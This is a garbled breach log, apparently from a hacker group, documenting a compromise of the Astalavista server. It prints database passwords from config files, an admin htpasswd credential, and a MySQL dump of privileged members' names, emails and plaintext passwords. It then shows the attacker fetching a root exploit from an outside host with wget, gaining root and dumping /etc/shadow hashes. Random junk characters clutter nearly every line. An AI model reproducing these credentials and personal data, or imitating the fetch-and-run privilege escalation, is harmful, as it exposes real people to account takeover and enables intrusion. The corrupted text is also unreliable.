drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
* q$ t& @$ r. d" Ydrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
; F6 t6 N$ w/ b, k# M-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
/ U( g+ R) E0 ?7 y- u( F5 Zdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
2 P$ n; J( y5 m% hdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
* B( J! ?* h% U; f/ j" zdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
+ }# G O- f' F-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php7 a4 F1 p. H) X3 Q/ k6 D, q* H
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico6 F/ s8 s" @- L) |
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed5 i4 B# Y) D9 S8 p+ l+ ]5 j' [. ~
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
3 d2 G* E5 \: L" N% C' \8 M- Q-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess0 h+ M" L/ G- r; Y
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
! Z0 ?- T/ n! ^0 E7 \; W5 `" W-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
$ t/ A! v7 ]/ E$ v: e/ u" C-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
, j# k# Y/ j& f, d$ n9 k* b9 a-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php& h, }2 H( t& b" f6 n9 B$ _
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php3 h( l. T" m+ U
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
) e, P8 n* d6 s0 L# |: Q! f4 tdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
3 K- p# g. Z% c* udrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
5 Z- @7 F5 n6 Q' v! F0 u3 J% ndrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib# H( @- \" c0 C6 x% E+ g7 @
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
) V% O# b5 ^0 m* _drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
. J8 c8 u9 {1 ~2 wdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata- [/ y) P& n( G0 r) G$ v7 ]
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new/ j6 O0 {+ @3 W, M3 ] J
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
) C$ q* }$ M/ ]/ Bdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
$ w& |( |9 [0 j# t ~# L: B-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
! E5 s& f3 s/ `. Y3 \drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss& s+ |: _$ n. C- ^6 a6 [
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
) `; y; R; X, p( u& w5 Odrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
3 N$ l% X9 X. L- K! M/ ydrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
4 n1 T3 ]' q9 B- \3 Tdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src8 Z& [& l# C4 n# d' a
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
# i/ g. Z q# w/ }5 ?& Ndrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
' I8 j& o( Z6 l: t; X! g {7 ]drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old8 s3 x4 `4 P+ I% Z: w# y, Q
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php; m5 c1 G8 a2 [8 P1 N7 }
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
! S8 [& f& Z* q' P8 L
& s' i E& P* O9 K5 [& N/ d/ r4 Msh-3.2$ head -20 index.php# W |7 f5 H* A' |
<?PHP
2 d1 u, r R5 q" Q" V6 v/**% |5 D6 m# g7 }. [& H5 Z/ q- I" n3 ]
* Mainfile (external) for astalavistaNET v2.0
: s& g7 ?' c5 O* X*
9 n$ b8 F; Q' V2 h$ d! y* @copyright Astalavista IT Engineering GmbH
& K/ j) c4 ]$ {. B4 D* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>2 v- |, J" c( y8 S
* @version 1.01 Q$ W4 T% W' z) d: f$ i! q2 w& p
*/
" v( h! S( o" ]2 i2 \
- _! e- ~0 V6 S( U' { if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {& r5 W" _% d6 |; v: t2 V# I
$dontStartSession = false;
. D& x- S8 V4 h1 i6 b } else {
; Z4 u% i, T6 E $dontStartSession = true;" g, S1 f% w6 {0 _0 ]$ a! Y0 K
}' `: G# j H: a
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);, U5 X0 r. \4 e n2 i
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);, `! w% r. K* q. p% q( `* F9 r- t
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);9 I% Z! }5 @) O5 S% ?
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);1 v; x& S4 Y1 Y
5 e: z# W1 {( {0 I, ?sh-3.2$ cd config: y4 {$ j% h r' p" S- Q- c
sh-3.2$ ls -la" z8 x, \) W8 u+ U
total 32
% t) D9 [- Q6 r7 \1 x1 xdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
* u5 H% t. O% I# ?drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..- r0 Q2 H, u: [* ?
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php, q9 j+ E5 O% N4 C: o/ W
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
7 L d( E8 x9 p' |: F/ i-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
7 z" {/ y8 z, [6 u z-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
J9 s! M" _9 C1 j-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php% O* T' \# I% ]. H: f4 F
Z7 O% F' k. i7 L5 ?* ~, |
sh-3.2$ cat com.conf.php
% J3 Z# {& _* v1 c7 R* l, ]6 S[snip]
3 b2 m5 d d1 K. p6 `& G" C, ]//member-database/ ~' W; X0 m4 X
$_CONFIG['db_mem_server'] = ‘localhost’;
; M, O2 L* T0 } T1 q: ^# P% J$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;2 ~8 [& `" D" m' G" d. y2 d- w
$_CONFIG['db_mem_user'] = ‘astanet_db’;6 H# ]0 k4 F* @! i) O8 G
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
: `* U" n# y* m" a9 \$_CONFIG['db_mem_debug'] = false; //true or false
J. C1 \. q$ q4 U, u5 a9 j |//ads-database8 j7 {: _2 j$ I
$_CONFIG['db_ads_server'] = ‘localhost’;
: p+ w4 r$ Z& m1 e* I0 E7 d& I( ?" g$_CONFIG['db_ads_database'] = ‘astanet_ads’;0 [1 |: g' d/ ], s
$_CONFIG['db_ads_user'] = ‘astanet_db’;
- A8 [# y2 F; v( b. R' |$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
# l5 s2 n% _& n3 R y$_CONFIG['db_ads_debug'] = false; //true or false
7 [ F7 O. e* a- c7 Q+ A0 T//rainbow-database
3 T: D$ H3 B: M0 I$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;3 V4 \/ B, {" X4 j4 i! P* w0 V
$_CONFIG['db_rainbow_database'] = ‘rainbow’;8 C# p% p; d' h4 L% }2 a
$_CONFIG['db_rainbow_user'] = ‘dinu’;) s' T8 ~/ H: d$ S- l0 u
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
1 c7 c! C8 N* }: j k& h/ T$_CONFIG['db_rainbow_debug'] = false; //true or false
8 t8 _4 I' `% g1 J+ s//mailing lists database
0 H( g! b+ I; W" y. k$_CONFIG['db_mailing_lists_server'] = ‘localhost’;+ s, T! N' b; S( y& u
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’; Q$ E- N A4 D, ]5 ~/ D
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;% C% n5 r/ H4 D. `7 O
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
$ S7 y1 ?( Z# A: i* u6 X- ?4 @( R$_CONFIG['db_mailing_lists_debug'] = false; //true or false
$ n' W! |, `% _9 ^//paypal
- {$ m4 C$ m1 |. i5 _' K$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
; Q- l D E% Y1 L& r1 K$_CONFIG['sub_pp_cmd'] = ‘_xclick’;! V/ d, ?; ]! n0 _) F7 Y( F$ E# h
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
( T- i; ?- [2 L g* n$_CONFIG['sub_pp_noship'] = ‘1′;
7 f/ A! I8 A* h2 ?8 H0 q) b$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
: [* P7 ]5 d! [[snip]5 e6 ^7 Z4 }) {; A" a
! `' K/ r1 H% R( `5 I: S
sh-3.2$ cd ..' s1 @$ O! b4 Q4 q
sh-3.2$ cd member6 `$ W3 J8 g& S
sh-3.2$ ls -la1 C. T8 a" ^2 w: c) H. S
total 200 w3 T2 L4 H/ F# Z1 C. N7 }( q
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
$ y3 y, B8 x* S( u* s+ n; mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
9 g/ |$ ?7 p$ [( C-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess# F' j! Y D' g, Z
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php3 b! C+ O3 J. x; Z
sh-3.2$ cat .htaccess
) A# I a1 s& O% s5 \3 TSecFilterEngine off( B) J% s0 S2 w2 h. p
; {- Y: n2 _6 |' A$ xsh-3.2$ cd ..
' |8 ]: ?) u- o0 M: h4 l( B# Esh-3.2$ cd cron
+ a4 {. J# A- B0 W% [9 c/ j3 Vsh-3.2$ ls -la
6 o5 V+ |: n4 Vtotal 1689 W' G6 t& j9 f8 n2 L" u! S- q
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .5 I( u% D/ k" a: \& ~; c( z7 A
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..1 U; G, S: W/ U
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php' J; H( G9 z6 N6 N. z. {
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
5 j$ C# K: b5 _# E3 q3 D- t, I' f-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php$ D: ^7 u# l. E3 L2 }# A1 U
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php8 Y: V5 F7 C+ y0 ~
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
; }0 }& g) T; P E-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php; ]* ?5 o$ g3 [( }
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
" X- z6 g6 _+ C! K# }-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php" X' }$ Y0 G. Z/ b" V8 Y
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh7 w4 a4 H) d: h5 v+ s8 j# m" I
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php' O" q A p' F+ n4 }
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php. w" m3 c1 y- O) l
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
+ K1 t( V* F- J' L4 F0 p-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh5 j: ^( M( l$ K' A3 j2 V
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php; B) d8 i8 ^+ j
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php: o5 a. h' o) C5 L. a
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
3 ~& m; a9 m* B& S: i+ ~# [$ n; K$ b4 j-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
/ u i+ `2 C z-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
' T2 e( I, X: L8 |+ L" F1 Jdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email6 ~8 Y/ ^3 |- e: Y
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
: r0 u8 j) ^2 H, J-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php' r. B* ~* T) M' t6 Z
/ \0 ^" F$ L8 Q, J) _ N: n a0 }4 gsh-3.2$ cd ..
- M7 h$ `# n4 hsh-3.2$ cd _007
6 O4 C9 ^" {. y. w& ~* dsh-3.2$ ls -la. Y- [. w* |* Q: `
total 244 \* f4 N0 b# ~7 {4 F' t* [! J) C( C
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .6 Q! Q. Y* \& |5 Q! d+ e h
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
( I3 E( I& y6 R* w( O-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess! p5 P0 Z0 r4 @4 b0 L+ }% b% v/ P
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
0 S7 j" p# _+ _$ r2 M: N: {8 E-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
) z- \ j$ c5 rdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap- O# n1 A% B" G
1 \ a5 D. j& r4 q
sh-3.2$ cat .htaccess1 O/ g1 M1 [! l3 S- _+ m. `1 I
authType Basic
6 S% A7 M0 H, x& \* f3 c1 F& k( lauthName Admin
7 X8 Y1 Y" p" j1 mauthUserFile /home/astanet/auth/.htadm_pwd
$ Q: E, N; y7 B- |require valid-user
4 f9 N; ~6 m- W1 |3 r7 H/ l6 ]0 s
* f W& o' L9 Z0 f; Rsh-3.2$ cat /home/astanet/auth/.htadm_pwd. I2 X7 [; I! P6 s, ^
admin2net:CR0bl65MwhfT1 D9 a1 Y) { x: [7 |6 u
& {# u* g. x, e
sh-3.2$ mysql -u astanet_db -p, S$ @' |6 K' N
Enter password:, B" k( L1 n8 X
Welcome to the MySQL monitor. Commands end with ; or \g.* _$ a a9 Z7 [6 c9 o
Your MySQL connection id is 275153
4 P/ f- F8 t4 CServer version: 5.0.45-community-log MySQL Community Edition (GPL)3 a. Y, y* D# Y* y
# ~6 C( K( q x/ U2 k R
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 q* I, _4 x' \! R6 v" u* f, |! p; Y
mysql> show databases;
2 I* U2 S0 P/ D" V+ n3 o$ W+———————–+: E; I2 i3 l8 h/ K
| Database |
! F' |$ X2 B6 t0 g4 ^) m+———————–+, n1 Q5 _& `8 Z# |- E$ i
| information_schema |3 p B) a" O$ E- a0 C4 q
| astanet_ads |! m! M7 {* A3 }( G; a& C8 h8 R
| astanet_mailing_lists |
* m( x/ h( c5 ^0 J| astanet_mediawiki |- z. `4 y4 y/ y: W& y$ R
| astanet_membersystem |4 {& p3 M5 ?6 m% \, T" w3 _& L- {
| test |" o% T* m: z) @
+———————–+$ e y) N" D5 `, A. ]. }- j, t
6 rows in set (0.00 sec)9 V: L" E+ t0 t5 T n$ J
' D$ y; j! l6 u: K: d* nmysql> use astanet_membersystem; V \' s' M7 C+ |( ^" P. y! ]
Database changed; s1 W7 c* L: m
mysql> show tables;6 i; z5 G$ \+ i' C& b
+———————————–+9 N Q8 H7 Y7 z- Y& d% U0 Y
| Tables_in_astanet_membersystem |
" f% A0 \. \5 \& h4 m, g+———————————–+- ~8 A6 v/ h! T) h$ M3 I' J3 Q% y
| blacklist_categories |4 B8 ~/ ^7 |, u
| blacklist_content |
8 J) \5 S5 t1 A( Y. z2 M; c* o| blacklist_levels |
' L' X) v" v/ M" n% N: ]/ G, m| blacklist_mcset |% v) f: d* t. u& I# c' Z# y4 n
| dir_categories |
( p7 v, k/ x0 i7 {! f| dir_comments |
8 a: Z% _$ x+ A% W| dir_links |
{5 i1 l8 z$ }# e1 S F/ K& e| dir_temp |4 U" E% T$ o$ ^: ?% o( V, p/ }; r
| dir_votes |
0 ]/ @, _" h2 x- n+ G( U* x| documents |
0 G h8 G; _% s* ~| documents_categories |
y$ a; F. [& g" u. E4 d7 V) I| email_content |6 k6 @& n; D* n0 K0 l3 k3 P& Q: o9 h
| email_settings |
* W/ I+ p# |. }| exploits |
! z( P4 v2 K& c( I7 @, A| exploits_categories |
- k/ K: P3 a$ y! ^ a3 y8 o$ ~# N% j| exploittree_categories |
1 E" i& {1 n* C| exploittree_exploits |' y. A# A0 g. o4 i
| home_values |
8 p) z3 O! ^& q1 q Z| iso_countries |
5 r7 S. \" G u7 |9 L| links_categories |; b5 f' E' Z- K% h' X
| links_records |
* y" w; W; i) ^| links_unauth |
7 H, ^* t. m+ K| links_votes |
, D! r- @$ L5 ]| log |# P2 i( O6 n7 }: J) F+ s; B
| news_categories |
5 ?9 j! x( G' _8 i+ R| news_comments |! Z/ j7 m! A; z
| news_emoticons |
$ I1 |+ r' q M- b| news_latest |
( o% @. m+ O' h' N& p7 d| news_messages |# ~/ M }% H' J9 g& v& \) _. p: I
| news_statistics |# S0 z5 A* r \4 @, G. v
| news_votes |/ N8 |, t- Q: p6 P, |) t* ^
| prices_content |
/ L6 `! ]& O& y* a) ?* Z; q8 O% \$ W| prices_offers |
" H' g4 s( u5 [0 B4 n8 y& G3 h| rss_settings |
& n) T1 l* I9 c: z/ `) U3 H| sessions |6 ^8 m) i4 C/ z' e/ E
| stats_signups |
/ u9 e( k$ Q1 s- ]+ k- z| u2u2 |
# G$ F# f; q/ J. o& h" X0 q! f# S3 }| u2u_contact |
' H1 r9 S& x: n& h8 @! t& u/ H2 y| u2u_settings |6 u; M1 D m! |. R* m
| user_keywords_selected_categories |$ y3 \3 S! `/ C! [. b& o; B
| users |
9 }3 L4 w% P: D| users_ipn_test |) A. B! Q9 Z* J6 h% b, O, t
| users_keyword_values |# h- F7 S( [+ A
| users_profile |% h: r/ m8 K; r, V! J
| users_temp |' T, h# B6 S* W. b) f; W6 v D4 y) U
| users_upgrade |9 L" X2 M& o" D+ ?* Z" v
+———————————–+
3 q/ o, ]; S5 y3 ]* a46 rows in set (0.00 sec)6 U7 ]8 y8 |$ r4 p# f0 @
9 F- ~ i+ q* f x( w' B
mysql> describe users;) @! c0 A- A4 C2 ^2 c
+————————–+————————————–+——+—–+———————+—————-+
) u6 l3 G$ U7 N+ u| Field | Type | Null | Key | Default | Extra |
4 [$ G7 o6 n$ D& g% E3 s ^+————————–+————————————–+——+—–+———————+—————-+0 w, x1 a3 `7 t1 R1 B$ Q& z( G e
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |; J8 h) U. U& s/ Z/ U
| user | varchar(50) | NO | | | |
$ d( P" M) C" [: R2 Q+ h( H| nickname | varchar(30) | NO | MUL | anonymous | |
. C6 f* s/ u, B, w o| password | varchar(30) | NO | | | |9 b% w* N( A( h/ d" X9 V$ d
| userlevel | tinyint(3) | YES | MUL | NULL | |
2 b; I% B M( o; o5 ]: c d8 x| exp | int(8) unsigned | NO | | 0 | |! j0 b7 n( e4 e: d
| email | varchar(50) | NO | | | |3 e* L" h: N# v. j
| ip | varchar(15) | NO | | 0 | |; t) H' a% C, \) f ~/ a
| proxy | set(’0′,’1′) | NO | | 0 | |( ^: a9 }! D" O2 m7 D+ x
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |! Y S) W* `# j( w, j/ A
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
' r- M, q2 N7 w7 F0 u1 ]) Z. n" H| anz_in | tinyint(1) | NO | | -1 | |
0 F( e0 X' ]' k( s/ A j| status | tinyint(1) unsigned | NO | | 0 | |& q+ o4 {( _3 d: w& m4 s* |
| checked | set(’0′,’1′,’2′) | NO | | 0 | |5 H" ]. f+ o& b/ y5 K. u& X( M4 C3 I) b
| freemember | set(’0′,’1′) | NO | | 0 | |- ~2 [ k- v4 Q7 q- Q# `" `$ p
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
9 x% |0 ]5 a! N* V0 S8 U| lang | tinytext | NO | | | |5 R s$ x" \$ r3 C- S4 w( i# g( b
| adid | smallint(6) | NO | | 0 | |
8 ]" b+ L& `( e9 J| pp_txn_id | varchar(255) | YES | | NULL | |
' c2 z' R# d1 `7 D, x) V' u6 d| cnb_transaction_id | varchar(255) | YES | | NULL | |; b. d" R% w$ u3 Q0 w
| cnb_order_id | varchar(255) | YES | | NULL | |
# s k6 f* r) t( g' v+ ]| cnb_user_id | int(11) | YES | | 0 | |$ W: ?( q/ Q; D+ l! w8 {% r+ }/ S
+————————–+————————————–+——+—–+———————+—————-+
% X. ^+ [% \) |' O8 j, H22 rows in set (0.01 sec)
3 Q; P' k) q1 F* U, m! o9 _% v3 w, Q& D1 r. r. N) M
mysql> select count(*) as skids from users;* A7 A* J* c! s+ d, ^5 T
+——-+ i$ E! I* s, y3 H: b8 [: O
| skids |! a$ r* n" z7 N: _- E" a% r
+——-+
+ T4 t% t* Y" }1 k, L" a- ~- O| 25199 |
) t% M& H& R( P5 v& }% `0 x/ A+——-+
7 Q* |; j% t1 A* \1 row in set (0.00 sec) d' M, U0 x" \
4 B7 g# O! E+ X
mysql> select user,nickname,password,email from users where userlevel = 1;
! ?6 I+ [5 n" A" x2 d+————————–+———————-+——————+———————————–+ [8 u* g0 k2 i" o* j- R3 ^
| user | nickname | password | email |
8 n" R4 Z7 s% s+————————–+———————-+——————+———————————–+9 s$ U% W) i* A6 R7 Q- N& ^
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
0 ?4 N. [4 C. t, q| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |6 F3 K* C6 A2 Z1 g5 a5 F
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |5 o( B) ]. W) P u1 y4 K
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
# {+ D. {: j/ T2 o# g| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |: T4 L8 X/ E' y/ w7 ^- W
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
6 }/ u, b. `5 I& t9 O3 {| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |+ i5 i! y3 G; X0 x" _, F3 L
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |% _4 {8 V9 p% X2 t- G& N5 E: z
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
) P) C. v# ?. J$ d| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
# J9 [( y$ H6 k% O* H7 L9 `2 a| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |8 A$ `( e" `) f: p6 F% A
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
& i* y9 j. v9 W5 D( m' V| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |1 P3 I; Y6 E( o8 ?6 }3 _) @% G
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |3 F) p4 r: j I: D+ q& O& |9 ~4 [8 s8 [
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |' T2 J( h5 _- f
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |( C" q. q6 O; Y+ W5 w6 o
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |% n- ~& o$ p& o5 B& E
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
8 I9 r4 s; h# u+ I3 S+ Q5 p| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |6 B2 K, l4 V( }
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
" \; |4 m6 k% w r| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
* k! L7 I7 v. `" I; |# i| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
9 D% }% _0 A# I1 j' x( F: Y| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |. R# F; L4 t! S l. \2 O
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
; \/ v. f( ]" P$ B d| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |# s( t* F5 j7 I7 i4 \4 U. A
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |& F2 o" W% ?6 N
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |; G! O) x1 n" u) ^+ q7 ^/ Z+ h4 X
+————————–+———————-+——————+———————————–+
! _- O. \6 \4 b) K: R9 r) s- L9 j27 rows in set (0.00 sec)
1 N: f) ]+ o" g2 o, w6 z2 S0 x# ~0 v; {5 |
mysql> exit;% }: e" [7 }: ^
Bye7 M8 G1 t( Y$ x
; J+ r# G; a! F7 q$ {7 i
[~] plaintext passwords? yes,/ \7 b* a& C/ j0 G4 P, z) \
Those so called “security professionals” who charge you $6.66 / month to
, b) T6 `9 @- ~# J' @/ n$ h$ s/ Fregister at their hack-proof portal, save your passwords in plaintext…% M6 B8 m/ I& L" W- Y) n
brilliant!
|/ x% n0 z; m, V+ B6 i$ Z9 ~$ S7 g5 W" m2 ~: ]: s" u* z* ]2 j# ]
[~] This been fun but we want more.+ @& p" j3 n5 R# {
& b) L( Y, B; N) p/ ?7 e
sh-3.2$ uname -a
' p4 O: {. f; ]) XLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
u, G+ J t( q+ D/ j7 _5 L5 fsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
1 g: B2 N8 b% T# e–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url] c5 q0 `5 V- T+ l z' r& V# Y
Resolving anti.sec.labs… 13.33.33.37
6 R" f2 s( d4 ?Connecting to anti.sec.labs|13.33.33.37|:80… connected./ R3 ^- N6 @) L L
HTTP request sent, awaiting response… 200 OK
; l) c$ X0 Z' J9 q9 G* mLength: 18200 (18K) [text/plain]
" I& [% q% T2 R( I1 M0 ~5 BSaving to: `g0troot’% X. W" f$ E2 ~5 x9 X8 }, N
0 K3 i3 J X+ p9 ]& C& ]100%[=========================================================================================================================================>] 18,200 58.6K/s in6 R+ |2 C$ E; n( i6 Q
0.3s% T3 U0 `0 U7 G
# x5 R4 r6 {3 h9 Y" _/ S. V% y
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]4 M2 P. v0 h% ]& ]; Q" z* j
' `2 ^( x! [* B) B+ wsh-3.2$ ./g0troot -i x86_64" j* _7 o4 n3 w
[+] g0troot - anti.sec.labs1 q8 t1 Z* A2 m0 D! n5 P% k
[+] Target: 2.6.18-128.1.10.el5
5 l1 ]& c7 Y0 u" F: K/ A1 V* Q& O5 q[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
/ F0 ]7 a! o1 d. `; Z, D7 `$ C; K. P7 i8 Q6 c1 w
[+] r00tr00t
* j' W9 a J1 M7 K[~] Executing shell…
4 e c% J; e$ D5 x+ q: ~
: ~0 \2 \! e) Z6 L$ w3 Ish-3.2# id" W) d+ f, q$ N& h5 d: w( M! }) i
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
3 B% M" `: h3 Q5 [$ z1 X) d) \! f8 W e% E$ {
sh-3.2# cat /etc/shadow$ y+ ^$ J7 ]# M) E# J0 P
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::. D% N6 m$ ?0 e) n
[snip]
. b S8 [" w, ]$ m, c; q6 {. iadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::8 q1 y, W) q( I0 b8 L
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
/ L0 e% V" t, X0 Hcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::6 a9 E7 j; ^5 z8 r5 y" g
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
, T4 t/ o8 O9 T' b0 E2 [; d7 m% ]7 \2 f$ D, y5 N2 T
sh-3.2# cat /etc/motd' d8 |. Y) \: t
#####################################################- S6 w' [1 @3 m# I1 _
